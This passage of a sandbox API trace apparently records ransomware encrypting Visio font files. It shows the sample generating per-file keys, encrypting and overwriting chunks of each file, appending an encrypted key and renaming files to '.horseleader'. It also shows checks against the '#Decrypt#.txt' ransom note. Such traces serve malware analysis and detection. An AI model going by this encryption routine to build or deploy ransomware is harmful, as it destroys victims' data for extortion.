files\\common files\\microsoft shared\\visio shared\\fonts\\whgdtxt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.574] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX") returned 81 [0250.574] StrStrW (lpFirst="WHGDTXT.SHX", 
lpSrch=".txt") returned 0x0 [0250.574] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=223699) returned 1 [0250.574] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.574] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.577] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.577] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.577] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x18ce9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.578] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.579] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.579] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.579] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x319d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.579] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, 
lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.581] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.581] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.581] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.581] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.581] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.582] CloseHandle (hObject=0x1a4) returned 1 [0250.582] GetProcessHeap () returned 0x780000 [0250.582] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.582] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX.horseleader") returned 93 [0250.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgdtxt.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgdtxt.shx.horseleader")) 
returned 1 [0250.583] GetProcessHeap () returned 0x780000 [0250.583] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.583] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x853f7be0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0x2fde5, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="WHGTXT.SHX", cAlternateFileName="")) returned 1 [0250.583] lstrcmpiW (lpString1="WHGTXT.SHX", lpString2="Windows") returned -1 [0250.584] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX") returned 80 [0250.584] StrStrIW (lpFirst="WHGTXT.SHX", lpSrch=".horseleader") returned 0x0 [0250.584] lstrcmpW (lpString1="WHGTXT.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.584] lstrcmpW (lpString1="WHGTXT.SHX", lpString2="_uninstalling_.png") returned 1 [0250.584] lstrlenW (lpString=".testttjffg") returned 11 [0250.584] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX", lpSrch=".testttjffg") returned 0x0 [0250.584] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.584] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.584] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgtxt.shx"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.586] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX") returned 80 [0250.586] StrStrW (lpFirst="WHGTXT.SHX", lpSrch=".txt") returned 0x0 [0250.586] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=196069) returned 1 [0250.586] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.586] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.589] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.589] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.590] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x156f2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.591] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.591] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.591] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.591] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x2ade5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.591] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.593] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.593] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.593] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.593] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.594] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.594] CloseHandle (hObject=0x1a4) returned 1 [0250.594] GetProcessHeap () returned 0x780000 [0250.594] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.594] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX.horseleader") returned 92 [0250.594] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio 
Shared\\Fonts\\WHGTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgtxt.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgtxt.shx.horseleader")) returned 1 [0250.595] GetProcessHeap () returned 0x780000 [0250.595] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.595] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0x9e413, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="WHTGTXT.SHX", cAlternateFileName="")) returned 1 [0250.596] lstrcmpiW (lpString1="WHTGTXT.SHX", lpString2="Windows") returned -1 [0250.596] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX") returned 81 [0250.596] StrStrIW (lpFirst="WHTGTXT.SHX", lpSrch=".horseleader") returned 0x0 [0250.596] lstrcmpW (lpString1="WHTGTXT.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.596] lstrcmpW (lpString1="WHTGTXT.SHX", lpString2="_uninstalling_.png") returned 1 [0250.596] lstrlenW (lpString=".testttjffg") returned 11 [0250.596] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX", lpSrch=".testttjffg") returned 0x0 [0250.596] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.596] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.596] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtgtxt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.597] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX") returned 81 [0250.597] StrStrW (lpFirst="WHTGTXT.SHX", lpSrch=".txt") returned 0x0 [0250.597] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=648211) returned 1 [0250.597] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.597] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.601] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.601] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.606] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x4ca09, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.606] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 
1 [0250.608] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.608] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.609] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x99413, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.609] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.611] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.611] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.611] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.611] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.612] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.612] CloseHandle (hObject=0x1a4) returned 1 [0250.612] GetProcessHeap () returned 0x780000 [0250.612] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 
0x7e3120 [0250.612] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX.horseleader") returned 93 [0250.612] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtgtxt.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTGTXT.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtgtxt.shx.horseleader")) returned 1 [0250.613] GetProcessHeap () returned 0x780000 [0250.613] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.613] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0xdfc98, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="WHTMTXT.SHX", cAlternateFileName="")) returned 1 [0250.613] lstrcmpiW (lpString1="WHTMTXT.SHX", lpString2="Windows") returned -1 [0250.613] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX") returned 81 [0250.613] StrStrIW (lpFirst="WHTMTXT.SHX", lpSrch=".horseleader") returned 0x0 [0250.613] lstrcmpW (lpString1="WHTMTXT.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.613] lstrcmpW (lpString1="WHTMTXT.SHX", lpString2="_uninstalling_.png") returned 1 [0250.613] lstrlenW (lpString=".testttjffg") returned 11 [0250.613] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX", lpSrch=".testttjffg") returned 0x0 [0250.613] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.613] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.614] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtmtxt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.614] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX") returned 81 [0250.614] StrStrW (lpFirst="WHTMTXT.SHX", lpSrch=".txt") returned 0x0 [0250.614] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=916632) returned 1 [0250.614] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.615] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.617] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.618] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.619] SetFilePointerEx (in: hFile=0x1a4, 
liDistanceToMove=0x6d64c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.619] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.621] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.621] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.621] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xdac98, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.621] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.624] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.624] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.624] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.624] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.624] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, 
nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.624] CloseHandle (hObject=0x1a4) returned 1 [0250.624] GetProcessHeap () returned 0x780000 [0250.624] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.624] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX.horseleader") returned 93 [0250.624] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtmtxt.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHTMTXT.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whtmtxt.shx.horseleader")) returned 1 [0250.625] GetProcessHeap () returned 0x780000 [0250.625] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.625] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0xdfc98, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="WHTMTXT.SHX", cAlternateFileName="")) returned 0 [0250.626] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0250.626] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio 